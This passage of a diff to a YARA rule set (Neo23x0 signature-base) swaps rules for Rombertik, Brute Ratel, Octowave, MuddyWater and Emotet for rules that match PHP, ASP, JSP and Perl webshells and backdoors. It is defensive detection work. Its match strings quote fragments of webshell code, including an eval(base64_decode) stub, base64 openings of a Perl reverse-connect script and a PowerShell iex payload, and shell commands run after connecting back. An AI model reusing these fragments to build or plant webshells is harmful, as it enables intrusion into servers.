+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		id = "ea1f657c-2023-50bb-a2ee-33c53ee8fb5e"
+		date = "2016-02-15"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L4241-L4253"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "cd6c152dd1e0689e0bede30a8bd07fef465fbcfa"
-		logic_hash = "a0edc53aea21bc317f510a4a463ca677d9dc1ec234ca9824bc46711c851f2ccc"
+		hash = "9a928d741d12ea08a624ee9ed5a8c39d"
+		logic_hash = "a9306747a5c9756f393c61562ed4a601c75c3a9491ad19a7b7dbae1fbd505e9a"
 		score = 75
-		quality = 83
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		quality = 85
+		tags = ""
 
 	strings:
-		$s0 = "$insert = \"INSERT INTO `logs` (`id`, `ip`, `name`, `host`, `post`, `time`, `bro" ascii
-		$s3 = "`post` text NOT NULL," fullword ascii
-		$s4 = "`host` text NOT NULL," fullword ascii
-		$s5 = ") ENGINE=InnoDB  DEFAULT CHARSET=latin1 AUTO_INCREMENT=5 ;\" ;" fullword ascii
-		$s6 = "$db->exec($columns); //or die(print_r($db->errorInfo(), true));;" fullword ascii
-		$s9 = "$db->exec($insert);" fullword ascii
-		$s10 = "`browser` text NOT NULL," fullword ascii
-		$s13 = "`ip` text NOT NULL," fullword ascii
+		$s0 = "<input name=\"submit_btn\" type=\"submit\" value=\"Execute Command\"></p>" fullword
+		$s1 = "<title>[ADDITINAL TITTLE]-phpShell by:[YOURNAME]<?php echo PHPSHELL_VERSION ?></"
+		$s2 = "href=\"mailto: [YOU CAN ENTER YOUR MAIL HERE]- [ADDITIONAL TEXT]</a></i>" fullword
 
 	condition:
-		filesize < 3KB and all of them
+		1 of them
 }
-rule SIGNATURE_BASE_Rombertik_Carbongrabber_Panel : FILE
+rule SIGNATURE_BASE_Myshell_Php_Php
 {
 	meta:
-		description = "Detects CarbonGrabber alias Rombertik Panel - file index.php"
-		author = "Florian Roth (Nextron Systems)"
-		id = "f6c04e27-bbab-5012-a4f9-71d49d252b83"
-		date = "2015-05-05"
-		modified = "2023-12-05"
-		reference = "http://blogs.cisco.com/security/talos/rombertik"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/crime_rombertik_carbongrabber.yar#L55-L73"
+		description = "Semi-Auto-generated  - file myshell.php.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		id = "eaf243cb-fa26-5f34-a724-60a08acff636"
+		date = "2016-02-15"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L4254-L4266"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "e6e9e4fc3772ff33bbeeda51f217e9149db60082"
-		logic_hash = "8b7fde3c3894b7aa83e05f6a1b820195276f8738fde218485c0465afaed88427"
+		hash = "62783d1db52d05b1b6ae2403a7044490"
+		logic_hash = "dd7b0fa637a8317986de0c2312b4b552f1110fb5a64590a9a21c854e5985fbb6"
 		score = 75
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		tags = ""
 
 	strings:
-		$s0 = "echo '<meta http-equiv=\"refresh\" content=\"0;url=index.php?a=login\">';" fullword ascii
-		$s1 = "echo '<meta http-equiv=\"refresh\" content=\"2;url='.$website.'/index.php?a=login" ascii
-		$s2 = "header(\"location: $website/index.php?a=login\");" fullword ascii
-		$s3 = "$insertLogSQL -> execute(array(':id' => NULL, ':ip' => $ip, ':name' => $name, ':" ascii
-		$s16 = "if($_POST['username'] == $username && $_POST['password'] == $password){" fullword ascii
-		$s17 = "$SQL = $db -> prepare(\"TRUNCATE TABLE `logs`\");" fullword ascii
+		$s0 = "@chdir($work_dir) or ($shellOutput = \"MyShell: can't change directory."
+		$s1 = "echo \"<font color=$linkColor><b>MyShell file editor</font> File:<font color"
+		$s2 = " $fileEditInfo = \"&nbsp;&nbsp;:::::::&nbsp;&nbsp;Owner: <font color=$"
 
 	condition:
-		filesize < 46KB and all of them
+		2 of them
 }
-rule SIGNATURE_BASE_Rombertik_Carbongrabber_Builder : FILE
+rule SIGNATURE_BASE_Simshell_1_0___Simorgh_Security_MGZ_Php
 {
 	meta:
-		description = "Detects CarbonGrabber alias Rombertik Builder - file Builder.exe"
-		author = "Florian Roth (Nextron Systems)"
-		id = "3233c139-ac06-576c-9870-51306d5aa385"
-		date = "2015-05-05"
-		modified = "2023-12-05"
-		reference = "http://blogs.cisco.com/security/talos/rombertik"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/crime_rombertik_carbongrabber.yar#L75-L92"
+		description = "Semi-Auto-generated  - file SimShell 1.0 - Simorgh Security MGZ.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		id = "51565555-a17b-59c7-b433-c3166fe0d7f0"
+		date = "2016-02-15"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L4267-L4280"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "b50ecc0ba3d6ec19b53efe505d14276e9e71285f"
-		logic_hash = "e9d13913ee03926920eba33a4dac2a6e9aeaaa54949c5bfea8dd956cf233abae"
+		hash = "37cb1db26b1b0161a4bf678a6b4565bd"
+		logic_hash = "590a1572877fafcd4425a04c12cd56194f03a63b7acad93c39d4b16dc5a1902d"
 		score = 75
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		tags = ""
 
 	strings:
-		$s0 = "c:\\users\\iden\\documents\\visual studio 2010\\Projects\\FormGrabberBuilderC++" ascii
-		$s1 = "Host(www.panel.com): " fullword ascii
-		$s2 = "Path(/form/index.php?a=insert): " fullword ascii
-		$s3 = "FileName: " fullword ascii
-		$s4 = "~Rich8" fullword ascii
+		$s0 = "Simorgh Security Magazine "
+		$s1 = "Simshell.css"
+		$s2 = "} elseif (ereg('^[[:blank:]]*cd[[:blank:]]+([^;]+)$', $_REQUEST['command'], "
+		$s3 = "www.simorgh-ev.com"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 35KB and all of them
+		2 of them
 }
-rule SIGNATURE_BASE_Rombertik_Carbongrabber_Builder_Server : FILE
+rule SIGNATURE_BASE_Jspshall_Jsp
 {
 	meta:
-		description = "Detects CarbonGrabber alias Rombertik Builder Server - file Server.exe"
-		author = "Florian Roth (Nextron Systems)"
-		id = "742003a2-3716-5ad9-a720-b9e2be71554a"
-		date = "2015-05-05"
-		modified = "2023-12-05"
-		reference = "http://blogs.cisco.com/security/talos/rombertik"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/crime_rombertik_carbongrabber.yar#L94-L117"
+		description = "Semi-Auto-generated  - file jspshall.jsp.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		id = "4bccad33-d26e-52c2-b7f8-802f2c8f3889"
+		date = "2016-02-15"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L4281-L4293"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "895fab8d55882eac51d4b27a188aa67205ff0ae5"
-		logic_hash = "693c92128166c72aded066fa66eef906a9f6027c65b889f3a487a38382f29982"
+		hash = "efe0f6edaa512c4e1fdca4eeda77b7ee"
+		logic_hash = "94c458d3f38ba21348b0202e2b81bbbc3859e97d64f101a9ea7ec6f036e38bc5"
 		score = 75
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		tags = ""
 
 	strings:
-		$s0 = "C:\\WINDOWS\\system32\\svchost.exe" fullword ascii
-		$s3 = "Software\\Microsoft\\Windows\\Currentversion\\RunOnce" fullword ascii
-		$s4 = "chrome.exe" fullword ascii
-		$s5 = "firefox.exe" fullword ascii
-		$s6 = "chrome.dll" fullword ascii
-		$s7 = "@KERNEL32.DLL" fullword wide
-		$s8 = "Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome" ascii
-		$s10 = "&post=" fullword ascii
-		$s11 = "&host=" fullword ascii
-		$s12 = "Ws2_32.dll" fullword ascii
-		$s16 = "&browser=" fullword ascii
+		$s0 = "kj021320"
+		$s1 = "case 'T':systemTools(out);break;"
+		$s2 = "out.println(\"<tr><td>\"+ico(50)+f[i].getName()+\"</td><td> file"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 250KB and 8 of them
+		2 of them
 }
-rule SIGNATURE_BASE_HKTL_Bruteratel_Badger_Indicators_Oct22_4 : FILE
+rule SIGNATURE_BASE_Webshell_Php
 {
 	meta:
-		description = "Detects Brute Ratel C4 badger indicators"
-		author = "Matthew @embee_research, Florian Roth"
-		id = "a62d08ae-0fb3-55e9-b6f8-7940f8032e4a"
-		date = "2022-10-12"
-		modified = "2023-12-05"
-		reference = "https://twitter.com/embee_research/status/1580030310778953728"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/hktl_bruteratel_c4_badger.yar#L2-L19"
+		description = "Semi-Auto-generated  - file webshell.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
+		date = "2016-02-15"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L4294-L4305"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "9af05225f462c8d4ec1fb14dc06bb789f76b0d818cb82c3dfcd5abc693727f33"
+		hash = "e425241b928e992bde43dd65180a4894"
+		logic_hash = "7b0f4f4afde7dcb44c9d877a72c961f3666278ce28a24ae8068cfbc32639e307"
 		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = ""
 
 	strings:
-		$s1 = { b? 89 4d 39 8c }
-		$s2 = { b? bd ca 3b d3 }
-		$s3 = { b? b2 c1 06 ae }
-		$s4 = { b? 74 eb 1d 4d }
+		$s2 = "<die(\"Couldn't Read directory, Blocked!!!\");"
+		$s3 = "PHP Web Shell"
 
 	condition:
-		filesize < 8000KB and all of ( $s* ) and not uint8( 0 ) == 0x02
+		all of them
 }
-rule SIGNATURE_BASE_Octowave_Loader_03_2025 : FILE
+rule SIGNATURE_BASE_Rootshell_Php
 {
 	meta:
-		description = "Detects opcodes found in Octowave loader DLLs and WAV steganography files"
-		author = "Jai Minton (@CyberRaiju) - HuntressLabs"
-		id = "d583c416-be20-5fcf-848e-edd037e3b0d4"
-		date = "2025-03-19"
-		modified = "2025-03-21"
-		reference = "https://yaratoolkit.securitybreak.io/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/mal_octowave_loader_mar25.yar#L1-L285"
+		description = "Semi-Auto-generated  - file rootshell.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		id = "aec6621e-f23a-5f9f-91f1-d2f1b1ab58d0"
+		date = "2016-02-15"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L4306-L4319"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "266568d5f0f95cc805a833745a9e63689234ae927c2903230438c080f7ec2e56"
+		hash = "265f3319075536030e59ba2f9ef3eac6"
+		logic_hash = "f836dd1825dc84212d32a034c0dde45d60ccd1eb667018abb60d671b61192666"
 		score = 75
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "0504BFBACB6E10B81196F625F2FE37B33500E7BF65FD82D3510A2B178C6CD5BD"
-		hash2 = "3A2DB0CB9EE01549A6B660D58115D112D36A744D65705394B54D7D95287C7A74"
-		hash3 = "EB50D06057FE123D6E9F7A76D3D1A4BC5307E8F15D017BE8F6031E92136CF36A"
-		hash4 = "24715920E749B014BA05F74C96627A27355C5860A14461C106AA48A7ABA371EA"
+		tags = ""
 
 	strings:
-		$opcode_1 = {
-			55
-			8B EC
-			56
-			57
-			8B D1
-			33 C0
-			8B FA
-			6A 06
-			59
-			AB
-			AB
-			AB
-			AB
-			8B 45 08
-			8B FA
-			83 62 10 00
-			8B F0
-			83 62 14 00
-			F3 A5
-			83 60 10 00
-		}
-		$opcode_2 = {
-			55
-			8B EC
-			8B 55 ??
-			56
-			8B F1
-			8B 46 ??
-			8B 4E ??
-			2B C1
-			3B D0
-			77 ??
-			83 7E ?? 07
-			53
-			8D 1C 11
-			57
-			89 5E ??
-			8B FE
-			76 ??
-			8B 3E
-			8D 04 12
-			50
-			FF 75 ??
-			8D 0C 4F
-			51
-			E8 ?? ?? ?? ??
-			83 C4 0C
-			33 C0
-			66 89 04 5F
-			8B C6
-			5F
-			5B
-			EB ??
-			52
-			FF 75 ??
-			8B CE
-			FF 75 ??
-			52
-			E8 ?? ?? ?? ??
-			5E
-			5D
-			C2 08 00
-		}
-		$opcode_3 = {
-			55
-			8B EC
-			8B 4D 08
-			83 C9 ??
-			56
-			3B 4D 10
-			77 1C
-			8B 75 0C
-			8B D6
-			8B 45 10
-			D1 EA
-			2B C2
-			3B F0
-			77 0C
-			8D 04 32
-			3B C8
-			0F 42 C8
-			8B C1
-			EB 03
-		}
-		$opcode_4 = {
-			56
-			8B F1
-			8B 46 14
-			83 F8 ??
-			76 ??
-		}
-		$opcode_5 = {
-			50
-			FF 36
-			E8 ?? ?? ?? ??
-			59
-			59
-			83 66 ?? 00
-		}
-		$opcode_6 = {
-			C7 46 14 ?? 00 00 00
-			66 89 06
-			5E
-			C3
-		}
-		$opcode_7 = {
-			55
-			8B EC
-			51
-			51
-			A1 ?? ?? ?? ??
-			33 C5
-			89 45 FC
-			8B 4D 0C
-			8B 45 08
-			89 45 F8
-			81 F9 00 10 00 00
-			72 ??
-			8D 45 0C
-			50
-			8D 45 F8
-			50
-			E8 ?? ?? ?? ??
-			8B 45 F8
-			59
-			59
-		}
+		$s0 = "shells.dl.am"
+		$s1 = "This server has been infected by $owner"
+		$s2 = "<input type=\"submit\" value=\"Include!\" name=\"inc\"></p>"
+		$s4 = "Could not write to file! (Maybe you didn't enter any text?)"
 
 	condition:
-		( uint16( 0 ) == ( 0x5a4d ) or uint32( 0 ) == 0x46464952 ) and filesize < 50000KB and all of them
+		2 of them
 }
-rule SIGNATURE_BASE_Octowave_Loader_Supporting_File_03_2025 : FILE
+rule SIGNATURE_BASE_Connectback2_Pl
 {
 	meta:
-		description = "Detects supporting file used by Octowave loader containing hardcoded values"
-		author = "Jai Minton (@CyberRaiju) - HuntressLabs"
-		id = "2c81c8b8-4b4d-55c9-9285-556e8b5303bd"
-		date = "2025-03-19"
-		modified = "2025-03-21"
-		reference = "https://x.com/CyberRaiju/status/1893450184224362946?t=u0X6ST2Qgnrf-ujjphGOSg&s=19"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/mal_octowave_loader_mar25.yar#L287-L312"
+		description = "Semi-Auto-generated  - file connectback2.pl.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		id = "4ddebc62-17d2-577e-84bd-207367078327"
+		date = "2016-02-15"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L4320-L4332"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "42abd38e704a17ef81b423829c2dd356749873a5d036e43cc2746debfb3f5434"
+		hash = "473b7d226ea6ebaacc24504bd740822e"
+		logic_hash = "7316c93f12dbbf6d0235601d8be88c199e37955507925222d00041d0ceaf01c7"
 		score = 75
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "C4CBAA7E4521FA0ED9CC634C5E2BACBF41F46842CA4526B7904D98843A7E9DB9"
-		hash2 = "F5CFB2E634539D5DC7FFE202FFDC422EF7457100401BA1FBC21DD05558719865"
-		hash3 = "56F1967F7177C166386D864807CDF03D5BBD3F118A285CE67EA226D02E5CF58C"
-		hash4 = "11EE5AD8A81AE85E5B7DDF93ADF6EDD20DE8460C755BF0426DFCBC7F658D7E85"
-		hash5 = "D218B65493E4D9D85CBC2F7B608F4F7E501708014BC04AF27D33D995AA54A703"
-		hash6 = "0C112F9DFE27211B357C74F358D9C144EA10CC0D92D6420B8742B72A65562C5A"
+		tags = ""
 
 	strings:
-		$unique_key = {1D 1C 1F 1E 01 01 03 02 05 04 07 06 09 D4 0E 0A 0D 0C 0F 0E 31 30 31 32 35 34 36 36 39 38 DC 3F 3D 3C 3E}
-		$unique_string = "MLONqpsrutwvyx"
-		$unique_string2 = "A@CBEDGFIHKJMLONqpsrutwvyx"
+		$s0 = "#We Are: MasterKid, AleXutz, FatMan & MiKuTuL                                   "
+		$s1 = "echo --==Userinfo==-- ; id;echo;echo --==Directory==-- ; pwd;echo; echo --==Shel"
+		$s2 = "ConnectBack Backdoor"
 
 	condition:
-		uint16( 0 ) != 0x5a4d and filesize < 10000KB and all of them
+		1 of them
 }
-rule SIGNATURE_BASE_Muddywater_Mal_Doc_Feb18_1 : FILE
+rule SIGNATURE_BASE_Defacekeeper_0_2_Php
 {
 	meta:
-		description = "Detects malicious document used by MuddyWater"
-		author = "Florian Roth (Nextron Systems)"
-		id = "5f275ee8-c6a9-532b-bc82-b109195171da"
-		date = "2018-02-26"
-		modified = "2023-12-05"
-		reference = "Internal Research - TI2T"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_muddywater.yar#L10-L26"
+		description = "Semi-Auto-generated  - file DefaceKeeper_0.2.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		id = "671323e2-42cb-5ce0-9839-5d01c446471c"
+		date = "2016-02-15"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L4333-L4345"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "b675b004f86695821737b7fc05276c8350e44f5822ec458a74658f895ccf7082"
+		hash = "713c54c3da3031bc614a8a55dccd7e7f"
+		logic_hash = "0ee3fed3441e9561867508e324d7a6b1808a8923513bf1c9b82f8238224c994c"
 		score = 75
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "3d96811de7419a8c090a671d001a85f2b1875243e5b38e6f927d9877d0ff9b0c"
+		tags = ""
 
 	strings:
-		$x1 = "aWV4KFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVuaWNvZGUuR2V0U3RyaW5nKFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmco" ascii
-		$x2 = "U1FCdUFIWUFid0JyQUdVQUxRQkZBSGdBY0FCeUFHVUFjd0J6QUdrQWJ3QnVBQ0FBS"
+		$s0 = "target fi1e:<br><input type=\"text\" name=\"target\" value=\"index.php\"></br>" fullword
+		$s1 = "eval(base64_decode(\"ZXZhbChiYXNlNjRfZGVjb2RlKCJhV2R1YjNKbFgzVnpaWEpmWVdKdmNuUW9"
+		$s2 = "<img src=\"http://s43.radikal.ru/i101/1004/d8/ced1f6b2f5a9.png\" align=\"center"
 
 	condition:
-		uint16( 0 ) == 0xcfd0 and filesize < 3000KB and 1 of them
+		1 of them
 }
-rule SIGNATURE_BASE_Muddywater_Mal_Doc_Feb18_2 : FILE
+rule SIGNATURE_BASE_Shells_PHP_Wso
 {
 	meta:
-		description = "Detects malicious document used by MuddyWater"
-		author = "Florian Roth (Nextron Systems)"
-		id = "117e1d33-63a3-52c8-acf6-bc61959193db"
-		date = "2018-02-26"
-		modified = "2023-12-05"
-		reference = "Internal Research - TI2T"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_muddywater.yar#L28-L46"
+		description = "Semi-Auto-generated  - file wso.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		id = "fdce6094-a88e-5da6-aeb0-bc97b15bf397"
+		date = "2016-02-15"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L4346-L4357"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "b198396d27b32f8aa57a25cd6e33deb2bcfb726731e2e07f8b9d50b5f6ff13a0"
+		hash = "33e2891c13b78328da9062fbfcf898b6"
+		logic_hash = "31ef69228b66b30300006f63b1e4d6e92c2512caca4bd915d418b48564b39c47"
 		score = 75
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "3d96811de7419a8c090a671d001a85f2b1875243e5b38e6f927d9877d0ff9b0c"
-		hash2 = "366d8b84a43a528e6aaf9ecfc38980b148f983967803914471ccf011b9bb0832"
+		tags = ""
 
 	strings:
-		$s1 = "*\\G{00020430-0000-0000-C000-000000000046}#2.0#0#C:\\Windows\\System32\\stdole2.tlb#OLE Automation" fullword wide
-		$s2 = "*\\G{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}#2.8#0#C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE16\\MSO.DLL#Microsoft " wide
-		$s3 = "*\\G{00020905-0000-0000-C000-000000000046}#8.7#0#C:\\Program Files\\Microsoft Office\\Office16\\MSWORD.OLB#Microsoft Word 16.0 O" wide
-		$s4 = "scripting.filesystemobject$" fullword ascii
-		$s5 = "ID=\"{00000000-0000-0000-0000-000000000000}\"" fullword ascii
+		$s0 = "$back_connect_p=\"IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbi"
+		$s3 = "echo '<h1>Execution PHP-code</h1><div class=content><form name=pf method=pos"
 
 	condition:
-		uint16( 0 ) == 0xcfd0 and filesize < 6000KB and all of them
+		1 of them
 }
-rule SIGNATURE_BASE_MAL_Muddywater_Droppedtask_Jun18_1 : FILE
+rule SIGNATURE_BASE_Backdoor1_Php
 {
 	meta:
-		description = "Detects a dropped Windows task as used by MudyWater in June 2018"
-		author = "Florian Roth (Nextron Systems)"
-		id = "d9ef379d-161f-59f1-873e-3af12b24b76b"
-		date = "2018-06-12"
-		modified = "2023-12-05"
-		reference = "https://app.any.run/tasks/719c94eb-0a00-47cc-b583-ad4f9e25ebdb"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_muddywater.yar#L48-L66"
+		description = "Semi-Auto-generated  - file backdoor1.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		id = "89f44a1c-8a42-58f6-9308-371f4e652bff"
+		date = "2016-02-15"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L4358-L4370"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "776ae1adab223ae258d1c1c0c501e177dafe196964a2ede31789a7caa8495b2d"
+		hash = "e1adda1f866367f52de001257b4d6c98"
+		logic_hash = "7c8840dc91c16b9fa19fee16e0159a7f13db23c96596e18da0cdab07931ce35b"
 		score = 75
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "7ecc2e1817f655ece2bde39b7d6633f4f586093047ec5697a1fab6adc7e1da54"
+		tags = ""
 
 	strings:
-		$x1 = "%11%\\scrobj.dll,NI,c:" wide
-		$s1 = "AppAct = \"SOFTWARE\\Microsoft\\Connection Manager\"" fullword wide
-		$s2 = "[DefenderService]" fullword wide
-		$s3 = "UnRegisterOCXs=EventManager" fullword wide
-		$s4 = "ShortSvcName=\" \"" fullword wide
+		$s1 = "echo \"[DIR] <A HREF=\\\"\".$_SERVER['PHP_SELF'].\"?rep=\".realpath($rep.\".."
+		$s2 = "class backdoor {"
+		$s4 = "echo \"<a href=\\\"\".$_SERVER['PHP_SELF'].\"?copy=1\\\">Copier un fichier</a> <"
 
 	condition:
-		uint16( 0 ) == 0xfeff and filesize < 1KB and ( 1 of ( $x* ) or 3 of them )
+		1 of them
 }
-rule SIGNATURE_BASE_MAL_Emotet_JS_Dropper_Oct19_1 : FILE
+rule SIGNATURE_BASE_Elmaliseker_Asp
 {
 	meta:
-		description = "Detects Emotet JS dropper"
-		author = "Florian Roth (Nextron Systems)"
-		id = "34605452-8f3d-540a-b66f-4f68d9187003"
-		date = "2019-10-03"
-		modified = "2023-12-05"
-		reference = "https://app.any.run/tasks/aaa75105-dc85-48ca-9732-085b2ceeb6eb/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/crime_emotet.yar#L2-L16"
+		description = "Semi-Auto-generated  - file elmaliseker.asp.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		id = "7ecf3d5c-be91-579e-905b-5f2ad03a0e42"
+		date = "2016-02-15"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L4371-L4384"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "563077f3bc8ee18a887eecb9f0591c693e5543a9875eebad2186745154af1ade"
+		hash = "b32d1730d23a660fd6aa8e60c3dc549f"
+		logic_hash = "969f0f12449375a9ebbb8a68fd4b3db395927416d5cceccdb7f2c64310430880"
 		score = 75
 		quality = 85
-		tags = "FILE"
-		hash1 = "38295d728522426672b9497f63b72066e811f5b53a14fb4c4ffc23d4efbbca4a"
-		hash2 = "9bc004a53816a5b46bfb08e819ac1cf32c3bdc556a87a58cbada416c10423573"
+		tags = ""
 
 	strings:
-		$xc1 = { FF FE 76 00 61 00 72 00 20 00 61 00 3D 00 5B 00
-               27 00 }
+		$s0 = "if Int((1-0+1)*Rnd+0)=0 then makeEmail=makeText(8) & \"@\" & makeText(8) & \".\""
+		$s1 = "<form name=frmCMD method=post action=\"<%=gURL%>\">"
+		$s2 = "dim zombie_array,special_array"
+		$s3 = "http://vnhacker.org"
 
 	condition:
-		uint32( 0 ) == 0x0076feff and filesize <= 700KB and $xc1 at 0
+		1 of them
 }
-
-rule SIGNATURE_BASE_MAL_Emotet_Jan20_1 : FILE
+rule SIGNATURE_BASE_Indexer_Asp
 {
 	meta:
-		description = "Detects Emotet malware"
-		author = "Florian Roth (Nextron Systems)"
-		id = "334ae7e5-0a46-5e95-bf53-0f343db4e4de"
-		date = "2020-01-29"
-		modified = "2023-12-05"
-		reference = "https://app.any.run/tasks/5e81638e-df2e-4a5b-9e45-b07c38d53929/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/crime_emotet.yar#L20-L37"
+		description = "Semi-Auto-generated  - file indexer.asp.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		id = "84ff60f9-36f7-5d29-9f38-8088fb42582e"
+		date = "2016-02-15"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L4385-L4396"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
